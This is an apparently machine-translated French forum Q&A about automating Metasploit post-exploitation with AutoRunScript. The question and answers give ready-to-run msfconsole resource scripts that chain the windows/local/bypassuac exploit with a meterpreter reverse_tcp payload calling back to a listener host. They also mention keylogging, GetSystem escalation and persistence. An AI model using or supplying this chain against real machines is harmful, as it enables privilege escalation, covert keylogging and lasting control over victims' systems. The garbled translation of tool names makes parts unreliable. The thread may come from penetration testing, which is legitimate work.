Existe-t-il un moyen d'exécuter des exploits nécessitant des paramètres tels que celui du titre, en utilisant AutorunScript?
J'ai pu utiliser Autorunscript pour exécuter parfaitement des commandes de poste, telles que keylog_recorder
ou checkvm
.
Mais quand j'ai ajouté mon script ceci:
use exploit/windows/local/bypassuac
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
set LPORT 443
set DisablePayloadHandler true
set SESSION 1
set TECHNIQUE EXE
set ExitOnSession false
exploit
J'ai ceci:
[*] Running command use exploit/windows/local/bypassuac
Loading extension exploit/windows/local/bypassuac...
[-] Failed to load extension: No module of the name ext_server_exploit/windows/local/bypassuac.x86.dll found
[*] Running command set TARGET 0
[-] Unknown command: set.
[*] Running command set PAYLOAD windows/meterpreter/reverse_tcp
[-] Unknown command: set.
Il est clair que je manque quelque chose ici. Comment puis-je faire ceci? Mon objectif est de pouvoir contourner UAC, d'utiliser GetSystem puis de passer de pied à l'aide des options de persistance.
En tant que note latérale, je comprends que l'utilisation de "Set Session 1" ne fonctionnera que pour le premier ordinateur de l'engagement. J'aurais besoin d'une variable pour faire référence à la session qui initie actuellement.
Quelqu'un a des solutions pour cela?
Vous devez donner les options directement là où vous définissez la modification automatique.
msf exploit(handler) > set AutoRunScript exploit/windows/local/bypassuac LHOST=192.168.0.1 LPORT=443
Vous ne pouvez pas exécuter ces commandes dans un autorunscript, car elles sont des commandes au MSFConsole, tandis que l'autoscriptrun ne fonctionne que sur le contexte de Medeprètre. Donc, vous auriez besoin de quelque chose comme ça:
#msfconsole.rc #Configure your listener and payload use multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.1 set LPORT 443 set AutoRunScript auto.rc exploit -j use exploit/windows/local/bypassuac set TARGET 0 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.1 set LPORT 443 set DisablePayloadHandler true set SESSION 1 set TECHNIQUE EXE set ExitOnSession false #here you can also set another AutoRunScript for your new payload exploit
Et sur l'auto.rc, vous pouvez mettre des choses comme:
# auto.rc
sysinfo
checkvm
Et toute autre commande de compteur ou module post.